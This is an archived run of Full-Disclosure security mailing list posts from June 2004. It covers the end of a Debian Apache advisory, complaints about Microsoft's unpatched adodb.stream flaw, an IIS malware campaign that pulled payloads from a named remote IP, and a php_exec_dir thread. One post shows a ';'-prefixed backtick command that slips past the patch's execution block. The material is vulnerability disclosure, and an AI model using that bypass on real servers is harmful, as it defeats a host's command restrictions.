      Size/MD5 checksum: 353488 0cb1fefd1daf2f3d3d74bc837e5dcee6
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_i386.deb
      Size/MD5 checksum: 822024 8f94a40d22fe86da3a513945745b46bd
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_i386.deb
      Size/MD5 checksum: 536422 18bec488eb2cb1f08234d063f3f018fc

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_ia64.deb
      Size/MD5 checksum: 436866 d73b9c14b39b1ce3cecdf25c4bb7b4d3
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_ia64.deb
      Size/MD5 checksum: 1012118 70574b1082626c0a63e4214ed2565965
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_ia64.deb
      Size/MD5 checksum: 949112 f455cbafb0be5fdbb61841e5f538f649

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_hppa.deb
      Size/MD5 checksum: 386164 2b45089dda26eba6c04313b636ac6d90
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_hppa.deb
      Size/MD5 checksum: 891114 b777e3971bfcf3fabcd8f00a6356f193
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_hppa.deb
      Size/MD5 checksum: 587064 b06b99057dce7e6501e716d65f8e75f9

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_m68k.deb
      Size/MD5 checksum: 347890 5d0c289522098f0f209df8444bb59b9e
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_m68k.deb
      Size/MD5 checksum: 820892 ec0656021adabae1022b461b882775b0
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_m68k.deb
      Size/MD5 checksum: 537236 280185606f9d5160454bc355818007fa

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_mips.deb
      Size/MD5 checksum: 376464 a94cf93b405cf05372fc5d4f8bf7672f
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_mips.deb
      Size/MD5 checksum: 843944 cb9e216b23a38b6d39296ce8b7ccf996
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_mips.deb
      Size/MD5 checksum: 576406 7cfff44064ce0f2a02c9cbb97b068d83

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_mipsel.deb
      Size/MD5 checksum: 376518 770cd115049bb2158e201549cc35520a
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_mipsel.deb
      Size/MD5 checksum: 842596 3b85507e74eb531d61429befd63ece53
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_mipsel.deb
      Size/MD5 checksum: 565592 2399177b56c48b52abe29ff6a48d5299

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_powerpc.deb
      Size/MD5 checksum: 366994 679d12a1cef75a8aa5b3408ab5c0bd79
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_powerpc.deb
      Size/MD5 checksum: 846036 7188ed09e4fc2a18fbb426516f57fe8b
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_powerpc.deb
      Size/MD5 checksum: 558974 e42357dd7be10c9bbc2b36a865792f5b

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_s390.deb
      Size/MD5 checksum: 363750 c5e1a6db42fce09c1e4076640894cb4f
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_s390.deb
      Size/MD5 checksum: 832464 3df3958b908e8f3acbe05f3e6acc032f
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_s390.deb
      Size/MD5 checksum: 559418 ef6af5cb54b3f4da25be386bf2c89ec7

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody5_sparc.deb
      Size/MD5 checksum: 360892 ed75775f79c9ed173c9e0baf2450be01
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody5_sparc.deb
      Size/MD5 checksum: 847292 b54050e25ac6166e390dd72018538bcf
    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody5_sparc.deb
      Size/MD5 checksum: 544812 d3b7f0401f78d5f4d87e724d0f17f30f

  These files will probably be moved into the stable distribution on
  its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA3JMiArxCt0PiXR4RAmLdAJ49eumuVLVG5nUWBAeJxDGTGaxWewCgrP00
emklR9M6PUQ+AmL2wf1Q96w=
=Bf1i
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Microsoft and Security

From: Burnes, James (james.burnesgwl.com)
Date: Fri Jun 25 2004 - 16:38:56 CDT

One word,

m-o-n-o-p-o-l-y

And what are you going to do about it, punk?

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-
> adminlists.netsys.com] On Behalf Of http-equivexcite.com
> Sent: Friday, June 25, 2004 10:02 AM
> To: bugtraqsecurityfocus.com
> Cc: NTBugtraqlistserv.ntbugtraq.com; full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Microsoft and Security
>
>
>
> Where is Microsoft now "protecting their customers" as they love
> to bray? Should not someone in authority of this public company
> step forward and explain themselves at this time?
>
> All of sudden panic is being created across the WWW with "IIS
> Exploit Infecting Web Site Visitors With Malware", "Mysterious
> Attack Hits Web Servers", "Researchers warn of infectious Web
> sites" all stemming from all news accounts from an
> unpatched "problem" with Internet Explorer now two weeks old and
> counting, which in fact in reality stems from 10 months ago,
> that being the adodb.stream safe for scripting control with
> write capabilities.
>
> What exactly is being done about this? Nothing. What does
> multiple billions of dollars buy you today. Nothing. However for
> $20 million you can almost fly to the moon.
>
> Someone ought to step forward and explaini what exactly is
> happening at this public company. The great "protector of their
> customers". One might even suggest that their entire "security"
> mandate be re-examined. What exactly do they consider a
> vulnerability? Something that suits them or something that's
> cost effective to fix. So what, a few people lose their
> identities, have a few dollars extracted from their bank
> accounts, have their home pages reset, we'll fix it when it
> suits us as we have to be on budget this quarter. The Big Boss
> says $40 billion isn't enough this year.
>
> A vulnerability:
>
> http://www.microsoft.com/technet/archive/community/columns/securi
> ty/essays/vulnrbl.mspx
>
> "A security vulnerability is a flaw in a product that makes it
> infeasible - even when using the product properly-to prevent an
> attacker from usurping privileges on the user's system,
> regulating its operation, compromising data on it, or assuming
> ungranted trust."
>
> what this gibberish? For the past 10 months the adobd.stream
> object is capable of writing files to the "all important
> customer's" computer. It has real world consequences. It rapes
> their computer. Does it fit into the gibberish custom
> definition. Plain and simple: "A security vulnerability is a
> flaw in a product that makes it infeasible". What kind of
> language is this. Reads like the financial department conjured
> it up.
>
> Disabling scripting won't solve it. Putting sites in one of the
> myriad of "zones' won't solve it. Internet Explorer can
> trivially be fooled into operating in the less than secure so-
> called "intranet zone" and it can be guided there remotely.
>
> What's happening here. Where is the Microsoft representative
> explaining all of this to the shareholders and "customers" they
> so dearly wish to protect. This is unacceptable. Someone must
> be held accountable.
>
>
> --
> http://www.malware.com
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Microsoft and Security

From: Brian Toovey (btooveyigxglobal.com)
Date: Fri Jun 25 2004 - 15:47:08 CDT

anybody got a packet dump of the attack yet so we can regex out this
vuln against IIS?

It is quite terrible that this IE vuln has gone on now for two weeks -
from what I undserstand this is a "product feature", and thats why they
havent addressed it.

We filter our local redirects at our proxy to protect against it. Your
thoughts on that method equiv?

Brian

On Fri, 2004-06-25 at 14:53, http-equivexcite.com wrote:

> Where is Microsoft now "protecting their customers" as they love
> to bray? Should not someone in authority of this public company
> step forward and explain themselves at this time?
>
> All of sudden panic is being created across the WWW with "IIS
> Exploit Infecting Web Site Visitors With Malware", "Mysterious
> Attack Hits Web Servers", "Researchers warn of infectious Web
> sites" all stemming from all news accounts from an
> unpatched "problem" with Internet Explorer now two weeks old and
> counting, which in fact in reality stems from 10 months ago,
> that being the adodb.stream safe for scripting control with
> write capabilities.
>
> What exactly is being done about this? Nothing. What does
> multiple billions of dollars buy you today. Nothing. However for
> $20 million you can almost fly to the moon.
>
> Someone ought to step forward and explaini what exactly is
> happening at this public company. The great "protector of their
> customers". One might even suggest that their entire "security"
> mandate be re-examined. What exactly do they consider a
> vulnerability? Something that suits them or something that's
> cost effective to fix. So what, a few people lose their
> identities, have a few dollars extracted from their bank
> accounts, have their home pages reset, we'll fix it when it
> suits us as we have to be on budget this quarter. The Big Boss
> says $40 billion isn't enough this year.
>
> A vulnerability:
>
> http://www.microsoft.com/technet/archive/community/columns/securi
> ty/essays/vulnrbl.mspx
>
> "A security vulnerability is a flaw in a product that makes it
> infeasible even when using the product properlyto prevent an
> attacker from usurping privileges on the user's system,
> regulating its operation, compromising data on it, or assuming
> ungranted trust."
>
> what this gibberish? For the past 10 months the adobd.stream
> object is capable of writing files to the "all important
> customer's" computer. It has real world consequences. It rapes
> their computer. Does it fit into the gibberish custom
> definition. Plain and simple: "A security vulnerability is a
> flaw in a product that makes it infeasible". What kind of
> language is this. Reads like the financial department conjured
> it up.
>
> Disabling scripting won't solve it. Putting sites in one of the
> myriad of "zones' won't solve it. Internet Explorer can
> trivially be fooled into operating in the less than secure so-
> called "intranet zone" and it can be guided there remotely.
>
> What's happening here. Where is the Microsoft representative
> explaining all of this to the shareholders and "customers" they
> so dearly wish to protect. This is unacceptable. Someone must
> be held accountable.

Brian Toovey
Senior Security Analyst
igxglobal

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iQIVAwUAQNyPSUa2wLxNZUkjAQKUdA//TBZeyrFn+i1tnobu0QrmlCNUMUHVYOUE
1zs7Qutg7O7sy7enxjgMIdMrWynSH11qZndoTKa4EAbASI+4IhHNz2KuK5ZBBzj7
iZZ09ebh4Fiwb+unkXEGD8tgpkoW8sj4NcekS4efAt4XFhCs6b4feHjbFkvpqbEC
3rhQDCX3gRBs+tH1RGA6ZOfoFSEgpQ+W6yMN70QJY5zSJT/upt/LHW/Jzwd2YgXi
XNWOzZDPwZeZk3PSRM3XOEyS0tXQPkikw/zEL2uGU05+IRn6mtDXK73byn/nI9gH
sdgpPjBuR3eCf98vtitir6gJAxMukkdDKxBetHUzCWaAWk2+z2qy1jl5PSN0w2gA
IxdD9KpRdTGOr612dYlIm097Ep4V/nfiTdCXAX1n4ogMenZDfKEI0/jSCC6qhfEW
15WAffhsfm9qm/gn/TySZbIVSqUf6N9VTSjL6QDAs9qJnaACUJOBco4Rt86OPwix
qgGGRcEvvb6iXVVBLWD0fUgU3h+WIqkLH5HKlsNGCIFZhsNtK5o407Rh943/9XxK
9WM1aPA/8gbaJavtrUGqs5tOoxdp5kFiYiqqRDqaCGDySTq/WuaIs9h5OzEwoLA6
GYVd788U82egIYxRaAHP1vFKz8whnuPPMRiCAeZty64g1/PiahzzVuJbYpHX9abo
IoQEFGhwWbo=Nref
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] New Auditor security collection announcement

mmoremote-exploit.org
Date: Fri Jun 25 2004 - 17:00:04 CDT

Hi there,

just like to announce, that the new version of the Auditor
security collection (auditor-220604-01B) is available now
at http://www.moser-informatik.ch/?page=products&lang=eng

Thanx for your feedback.

Greetings

Max

Changes in this version:
------------------------
Keyboard mapping is choosable during each boot. ZIP
compression is used, because a bunch of users did not know
bzip2. Booting from a USB CD-ROM device is supported now,
see the new bootusb parameter. New bootmenu and new reso-
lutions. The whole distro is based on the Linux Kernel 2.6.6.
Includes many new wireless drivers. Smooth support now for
newer Orinocco firmwares. Dragorns Orinocco monitor mode patch
used. More kernel driver modules included. Better acpi and
power management support. Alsa 1.0.4 used for better sound
support. New hydra version, including a nice gui XHydra.
Modified Wellenreiter to work with all supported cards again.
Kismet scans now all 14 channels as default setting.
The amazing Metasploit framework has been added and IPW2100
centrino driver integration optimized. Nessus plugins upgraded.
Some bugfixing.

What's Auditor security collection?
-----------------------------------
The Swiss Army Knife for security assessments.
A Linux-based, unified platform focused on penetration tests.
The robust power of Open-Source tools without the hassles of
configuring hardware or installing any additional software.
This powerful toolset is started directly from the CD-ROM
without any local installation. Independent of system hard-
ware, Auditor security collection provides the user with over
300 powerful analysis tools for troubleshooting and securing
networks. Delivering powerful, functional tools in a user-
friendly environment while eliminating complex configuration
was our goal when designing Auditor security collection.

No other commercial or freely available analysis platform
offers an equivalent level of usability with automatic
configuration.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: Microsoft and Security

From: Drew Copley (dcopleyeEye.com)
Date: Fri Jun 25 2004 - 17:40:42 CDT

> -----Original Message-----
> From: http-equivexcite.com [mailto:1malware.com]
> Sent: Friday, June 25, 2004 11:53 AM
> To: bugtraqsecurityfocus.com
> Subject: Microsoft and Security

<snip>

> A vulnerability:
>
> http://www.microsoft.com/technet/archive/community/columns/securi
> ty/essays/vulnrbl.mspx
>
> "A security vulnerability is a flaw in a product that makes it
> infeasible - even when using the product properly-to prevent an
> attacker from usurping privileges on the user's system,
> regulating its operation, compromising data on it, or assuming
> ungranted trust."
>
> what this gibberish? For the past 10 months the adobd.stream
> object is capable of writing files to the "all important
> customer's" computer. It has real world consequences. It rapes
> their computer. Does it fit into the gibberish custom
> definition. Plain and simple: "A security vulnerability is a
> flaw in a product that makes it infeasible". What kind of
> language is this. Reads like the financial department conjured
> it up.

LOL. Very well said...

I think the point is not being pushed home, though.

Ten month old vulnerability. Common denominator for all of these
attacks. This latest one is using the same flaw we saw in one
this past Spring. It is not the latest zero day, according to
Symantec's latest paper.

In fact, even they state up front "to deploy the workaround for
the adodb stream issue". Workaround.

This adodb stream issue - found by Jelmer - is unfixed by Microsoft.

I do not know why. I suppose it fits into their competitive "motif"
somehow. They like to do these sorts of things.

It is a "bar lowering" vulnerability. Otherwise, these other attacks
would not work. They never would have worked.

The workaround kill bits the activex. There is no reason for it,
not enough of one. I think some IIS systems may use it. I am sure
it provides some sort of piece in their competitive marketing
strategy. But, kill the dying horse already.

Here is the free fix I made (ten months ago, re-released):
http://www.eeye.com/html/research/alerts/AL20040610.html

There is a reg file or an exe file. Whichever one prefers. We
find the exe file is most handy for doing mass fixes across
corporate networks.

Clue, people: Likely, you have been affected by one of these
holes. If you are an administrator, your domain has almost
surely been affected.

There is a huge market for identities. Do not be naive.

>
> Disabling scripting won't solve it. Putting sites in one of the
> myriad of "zones' won't solve it. Internet Explorer can
> trivially be fooled into operating in the less than secure so-
> called "intranet zone" and it can be guided there remotely.
>
> What's happening here. Where is the Microsoft representative
> explaining all of this to the shareholders and "customers" they
> so dearly wish to protect. This is unacceptable. Someone must
> be held accountable.
>
>
> --
> http://www.malware.com
>
>
>
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Disassembled Source for latest Backdoor-axj?

From: Burnes, James (james.burnesgwl.com)
Date: Fri Jun 25 2004 - 18:45:32 CDT

Does anyone have a good disassembled source listing for the latest
backdoor-axj? Of course if you have the original commented source, I'll
take that also. ;-)

thx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Nasir Ghaznavi (nasirghaznavigmail.com)
Date: Fri Jun 25 2004 - 19:04:49 CDT

As of now the server, which was a russian server has been taken down.

Nasir Ghaznavi

On Fri, 25 Jun 2004 10:36:08 +0100, Duncan Hill
<dhill+fulldisccricalix.net> wrote:
>
> On Friday 25 June 2004 07:05, Peter Kruse might have typed:
>
> > When the javascript runs it will try to redirect you to a remote server
> > http://217.107.218.147. This is where the MSITS.EXE and the javascripts are
> > stored. As far as I know they do not reside on the compromised IIS servers,
> > but simply pulls of the the payload from the remote host. Meanwhile the
> > host is no longer available.
>
> I've noticed that several ISPs appear to have null-routed that IP. I can't
> get past our ISP's upstream right now - trace just dies.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 16:48:14 CDT

volunteer as an expert witness when the negligence lawsuits
finally arise :)

and you?

"Burnes, James" <james.burnesgwl.com> said:

> One word,
>
> m-o-n-o-p-o-l-y
>
> And what are you going to do about it, punk?
>
>
>
> > -----Original Message-----
> > From: full-disclosure-adminlists.netsys.com [mailto:full-
disclosure-
> > adminlists.netsys.com] On Behalf Of http-equivexcite.com
> > Sent: Friday, June 25, 2004 10:02 AM
> > To: bugtraqsecurityfocus.com
> > Cc: NTBugtraqlistserv.ntbugtraq.com; full-
disclosurelists.netsys.com
> > Subject: [Full-Disclosure] Microsoft and Security
> >
> >
> >
> > Where is Microsoft now "protecting their customers" as they
love
> > to bray? Should not someone in authority of this public
company
> > step forward and explain themselves at this time?
> >
> > All of sudden panic is being created across the WWW with "IIS
> > Exploit Infecting Web Site Visitors With
Malware", "Mysterious
> > Attack Hits Web Servers", "Researchers warn of infectious Web
> > sites" all stemming from all news accounts from an
> > unpatched "problem" with Internet Explorer now two weeks old
and
> > counting, which in fact in reality stems from 10 months ago,
> > that being the adodb.stream safe for scripting control with
> > write capabilities.
> >
> > What exactly is being done about this? Nothing. What does
> > multiple billions of dollars buy you today. Nothing. However
for
> > $20 million you can almost fly to the moon.
> >
> > Someone ought to step forward and explaini what exactly is
> > happening at this public company. The great "protector of
their
> > customers". One might even suggest that their
entire "security"
> > mandate be re-examined. What exactly do they consider a
> > vulnerability? Something that suits them or something that's
> > cost effective to fix. So what, a few people lose their
> > identities, have a few dollars extracted from their bank
> > accounts, have their home pages reset, we'll fix it when it
> > suits us as we have to be on budget this quarter. The Big
Boss
> > says $40 billion isn't enough this year.
> >
> > A vulnerability:
> >
> >
http://www.microsoft.com/technet/archive/community/columns/securi
> > ty/essays/vulnrbl.mspx
> >
> > "A security vulnerability is a flaw in a product that makes
it
> > infeasible - even when using the product properly-to prevent
an
> > attacker from usurping privileges on the user's system,
> > regulating its operation, compromising data on it, or
assuming
> > ungranted trust."
> >
> > what this gibberish? For the past 10 months the adobd.stream
> > object is capable of writing files to the "all important
> > customer's" computer. It has real world consequences. It
rapes
> > their computer. Does it fit into the gibberish custom
> > definition. Plain and simple: "A security vulnerability is a
> > flaw in a product that makes it infeasible". What kind of
> > language is this. Reads like the financial department
conjured
> > it up.
> >
> > Disabling scripting won't solve it. Putting sites in one of
the
> > myriad of "zones' won't solve it. Internet Explorer can
> > trivially be fooled into operating in the less than secure
so-
> > called "intranet zone" and it can be guided there remotely.
> >
> > What's happening here. Where is the Microsoft representative
> > explaining all of this to the shareholders and "customers"
they
> > so dearly wish to protect. This is unacceptable. Someone
must
> > be held accountable.
> >
> >
> > --
> > http://www.malware.com
> >
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: VeNoMouS (venomgen-x.co.nz)
Date: Fri Jun 25 2004 - 20:34:44 CDT

Dude do you even know what php_exec_dir patch is, its a patch so you dont
have to turn safe mode on, which disables a bunch of shit that you need, so
the patch was a work around simply stop you executing programs.

heres a hint, learn about the product b4 you spam a mailing list, i see 5
posts from you asking the exact same question 2 hrs apart from each other
you think you could've googled in that time or perhaps fixed your mail
queue?

either or, stop being so fucking lazy.

----- Original Message -----
From: "npguy" <npguywebsurfer.com.np>
To: "VeNoMouS" <venomgen-x.co.nz>; <full-disclosurelists.netsys.com>
Sent: Friday, June 25, 2004 2:47 AM
Subject: Re: [Full-Disclosure] flaw in php_exec_dir patch

> is your safe mode on? .. whats ur platorm.
> give more details!
>
> On Wednesday 23 June 2004 07:05 am, VeNoMouS wrote:
>> Found a issue last night while testing php_exec_dir patch
>>
>> if you do the following
>>
>> $blah=`ps aux`;
>> echo nl2br($blah);
>>
>> php_exec_dir will block the call if you have set the exec_dir parm in php
>> or apache
>>
>> anyway.... if you do this
>>
>> $blah=`;ps aux`;
>> echo nl2br($blah);
>>
>> it bypasses the exec block and excutes the ps due to the ';', as bash
>> interrupts ';' as a new cmd, ive emailed the author but no response.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 10:41:04 CDT

Where is Microsoft now "protecting their customers" as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?

All of sudden panic is being created across the WWW with "IIS
Exploit Infecting Web Site Visitors With Malware", "Mysterious
Attack Hits Web Servers", "Researchers warn of infectious Web
sites" all stemming from all news accounts from an
unpatched "problem" with Internet Explorer now two weeks old and
counting, which in fact in reality stems from 10 months ago,
that being the adodb.stream safe for scripting control with
write capabilities.

What exactly is being done about this? Nothing. What does
multiple billions of dollars buy you today. Nothing. However for
$20 million you can almost fly to the moon.

Someone ought to step forward and explaini what exactly is
happening at this public company. The great "protector of their
customers". One might even suggest that their entire "security"
mandate be re-examined. What exactly do they consider a
vulnerability? Something that suits them or something that's
cost effective to fix. So what, a few people lose their
identities, have a few dollars extracted from their bank
accounts, have their home pages reset, we'll fix it when it
suits us as we have to be on budget this quarter. The Big Boss
says $40 billion isn't enough this year.

A vulnerability:

http://www.microsoft.com/technet/archive/community/columns/securi
ty/essays/vulnrbl.mspx

"A security vulnerability is a flaw in a product that makes it
infeasible – even when using the product properly—to prevent an
attacker from usurping privileges on the user's system,
regulating its operation, compromising data on it, or assuming
ungranted trust."

what this gibberish? For the past 10 months the adobd.stream
object is capable of writing files to the "all important
customer's" computer. It has real world consequences. It rapes
their computer. Does it fit into the gibberish custom
definition. Plain and simple: "A security vulnerability is a
flaw in a product that makes it infeasible". What kind of
language is this. Reads like the financial department conjured
it up.

Disabling scripting won't solve it. Putting sites in one of the
myriad of "zones' won't solve it. Internet Explorer can
trivially be fooled into operating in the less than secure so-
called "intranet zone" and it can be guided there remotely.

What's happening here. Where is the Microsoft representative
explaining all of this to the shareholders and "customers" they
so dearly wish to protect. This is unacceptable. Someone must
be held accountable.

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE exploit runs code from graphics?

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 01:22:08 CDT

> files (.CHM) from some web site, causing the HTML code inside the .CHM
> to be run in the "My Computer" security zone. Typically (like all but
> one of _dozens and dozens_ of these I've seen) the "inner" HTML run

this is one of the _dozens and dozens_ reasons to use mozilla on untrusted sites and use ie to access internal websites if they do depend of some ie features but set the default browser to mozilla so that when ever the user cliks something it opens in mozilla

> That is hardly the same thing as "embedded code hidden in graphics on
> Web pages", but I can easily imagine a naïve journalist getting
> confused over such technical issues or a company representative
> hankering for some media exposure over-selling the seriousness or
> novelty of what they "discovered"...

and these are the people who raise the script kiddies to "elite hackers!"

-aditya

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
éb½êÞvë"ž axZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 01:25:56 CDT

> I can only second Charles' and Isi's statements.... I sent a mail
> earlier this morning to the list, and it was bounced back to me by
> different engines. I made my case worse by underlining the fact that
> the body of the messages sent under my sp**fed identity were either
> advertising P*RN sites, or were plain SP*M for any kind of products..
> the full and correct spelling of P*RN and SP*M triggered also some
> sites to reject straight away my message ;-). Life is not easy, and it
> seems we ain't seen anything yet... oh well...:-)

this is where you can see the deficencies of the smtp and the admins of the sites recieving the mail

-aditya
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
éb½êÞvë"ž axZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 01:21:58 CDT

> I can also confirm that this is continuing from one of my many email adresses also.

so now we know that not only the spammers are slime and are the people who do "organised crime" but they are rasists

-aditya

i know this has nothing to do with security so please send mail on my personal address and *NOT* to the list

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
éb½êÞvë"ž axZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: npguy (npguywebsurfer.com.np)
Date: Sat Jun 26 2004 - 03:30:41 CDT

hi venom,

which patch are u talking ..
well did u ever try

http://www.google.com/search?q=php_exec_dir+site:www.php.net&l=en

there are quite a few entry which tells nothing except similar to ur post
well give a try in php-internals archive. u just get nothing. actually which
patch are u talking about. it was never issued officially and was not around
in the communities. you are talking about some unkown directives that was
never intend to be used. people often make a use of apache directives to
allow non-safe mode to their trusted scripts, that is what i see a good
solution for the time being. anyway if its a cool patch i am interested! give
me some references.

> heres a hint, learn about the product b4 you spam a mailing list, i see 5
> posts from you asking the exact same question 2 hrs apart from each other

well i never posted and saw it in the list u might be wrong.
actually there were some postings about this patches existence. did u check
that.

On Saturday 26 June 2004 07:19 am, VeNoMouS wrote:
> Dude do you even know what php_exec_dir patch is, its a patch so you dont
> have to turn safe mode on, which disables a bunch of shit that you need, so
> the patch was a work around simply stop you executing programs.
>
> heres a hint, learn about the product b4 you spam a mailing list, i see 5
> posts from you asking the exact same question 2 hrs apart from each other
> you think you could've googled in that time or perhaps fixed your mail
> queue?
>
> either or, stop being so fucking lazy.
>
>
> ----- Original Message -----
> From: "npguy" <npguywebsurfer.com.np>
> To: "VeNoMouS" <venomgen-x.co.nz>; <full-disclosurelists.netsys.com>
> Sent: Friday, June 25, 2004 2:47 AM
> Subject: Re: [Full-Disclosure] flaw in php_exec_dir patch
>
> > is your safe mode on? .. whats ur platorm.
> > give more details!
> >
> > On Wednesday 23 June 2004 07:05 am, VeNoMouS wrote:
> >> Found a issue last night while testing php_exec_dir patch
> >>
> >> if you do the following
> >>
> >> $blah=`ps aux`;
> >> echo nl2br($blah);
> >>
> >> php_exec_dir will block the call if you have set the exec_dir parm in
> >> php or apache
> >>
> >> anyway.... if you do this
> >>
> >> $blah=`;ps aux`;
> >> echo nl2br($blah);
> >>
> >> it bypasses the exec block and excutes the ps due to the ';', as bash
> >> interrupts ';' as a new cmd, ive emailed the author but no response.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: VeNoMouS (venomircwhores.co.nz)
Date: Fri Jun 25 2004 - 20:39:08 CDT

for real? i find it on the first line when i search for it.

http://www.google.co.nz/search?hl=en&ie=UTF-8&q=php-exec-dir+patch&meta=

PHP patc exec_dirh
... the archive, step into the directory created: $ cd
/path/to/directory/with/php-xyz
Now apply the patch: $ zcat /path/to/file/php-exec-dir.xyz.patch.gz | patch
...
